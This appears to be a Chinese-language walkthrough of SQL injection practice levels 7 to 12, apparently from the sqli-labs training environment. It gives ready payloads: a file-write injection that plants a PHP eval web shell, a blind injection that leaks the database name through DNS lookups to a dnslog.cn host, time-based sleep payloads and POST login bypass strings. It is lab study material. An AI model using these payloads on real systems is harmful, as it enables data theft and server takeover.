继承前文,我们今天接着向大家分享指南。话不多说,直接开始。
第七关
文件读写注入
直接注入
1')) union select 1,'<?php eval($_REQUEST[23]); ?>',3 into outfile 'D://1.php' -- -
第八关
基于’的盲注(利用dns回显
直接注入
id=1' and load_file(concat("\\\\",(database()),".2bmfvu.dnslog.cn\\1.txt")) -- -
然后进入DNSlog.cn网站
1.获取DNS地址。
2、将地址复制填入SQL语句中执行
3、在DNSLog.cn
网站会看到回显结果为security
效果如图:
第九关
基于’的时间盲注
直接注入
id=1' and if(length(database())>3 ,sleep(5),1) -- -
第十关
基于”的时间盲注
直接注入(怎么样,发现了什么,没错,和上面一摸一样,只有单双引号的区别)
id=1" and if(length(database())>7 ,sleep(5),1) -- -
第十一关
基于’的post型的注入
admin' and 1=1 -- -
第十二关
基于")的POST型注入
admin") and 1=1 -- -